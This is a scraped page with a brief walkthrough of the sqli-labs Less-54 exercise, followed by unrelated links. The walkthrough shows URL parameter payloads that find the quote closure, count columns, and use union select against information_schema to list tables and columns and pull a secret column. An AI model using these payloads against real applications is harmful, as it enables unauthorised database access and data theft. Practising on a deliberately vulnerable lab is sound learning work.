当前位置:网站首页>SQL injection Less54 (limited number of SQL injection + union injection)
SQL injection Less54 (limited number of SQL injection + union injection)
2022-07-31 22:52:00 【HUAWEI CLOUD】
Limited number of SQL injections
Each reset, the table name of the database, field names and data will change
?id=1
?id=1'
No error message found
?id=1"
The echo is normal, check the closing method at the beginning of double quotation marks directly
?id=1'--+?id=1')--+?id=1'))--+
The single quote echo is normal, so it is closed by the single quote
?id=1' order by 3--+ The echo is normal?id=1' order by 4--+ The echo is wrong
So there are three columns
?id=-1' union select 1,version(),database()--+
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+
?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+
边栏推荐
- @JsonFormat(pattern=“yyyy-MM-dd“)时间差问题
- 内核对设备树的处理
- hboot与recovery、boot.img、system.img
- ECCV 2022 Huake & ETH propose OSFormer, the first one-stage Transformer framework for camouflaging instance segmentation!The code is open source!...
- C#中引用类型的变量做为参数在方法调用时加不加 ref 关键字的不同之处
- (26)Blender源码分析之顶层菜单的关于菜单
- Write a database document management tool based on WPF repeating the wheel (1)
- 「SDOI2016」征途 题解
- 日常--Kali开启SSH(详细教程)
- The difference between adding or not adding the ref keyword when a variable of reference type is used as a parameter in a method call in C#
猜你喜欢
Collation of knowledge points in Ningbo University NBU IT project management final exam
Document management and tools in the development process
What is customer profile management?
![[Code Hoof Set Novice Village 600 Questions] Merge two numbers without passing a character array](/img/4d/038e6cd6ecad19934122cff89f4d76.png)
[Code Hoof Set Novice Village 600 Questions] Merge two numbers without passing a character array
IJCAI2022 | 代数和逻辑约束的混合概率推理
20. Support vector machine - knowledge of mathematical principles
Binary tree non-recursive traversal
ThreadLocal
Chapter VII
Shell常用脚本:Nexus批量上传本地仓库增强版脚本(强烈推荐)
随机推荐
Go1.18 upgrade function - Fuzz test from scratch in Go language
HTC using official firmware as bottom bag made ROM brush card bag tutorial
手写一个简单的web服务器(B/S架构)
Handwritten a simple web server (B/S architecture)
cas and spin locks (is lightweight locks spin locks)
MySQL数据库‘反斜杠\’ ,‘单引号‘’,‘双引号“’,‘null’无法存储
Go mode tidy reports an error go warning “all” matched no packages
Structure of the actual combat battalion module eight operations
基于mysql的消息队列设计
A shortcut to search for specific character content in idea
【Acwing】第62场周赛 题解
Audio alignment using cross-correlation
SQL27 View user details of different age groups
AI automatic code writing plugin Copilot (co-pilot)
Drawing process of hand-drawn map of scenic spots
Design of Fire and Anti-theft System Based on Single Chip GSM
Binary tree non-recursive traversal
Chapter VII
Linux environment redis cluster to build "recommended collection"
Dry goods | 10 tips for MySQL add, delete, change query performance optimization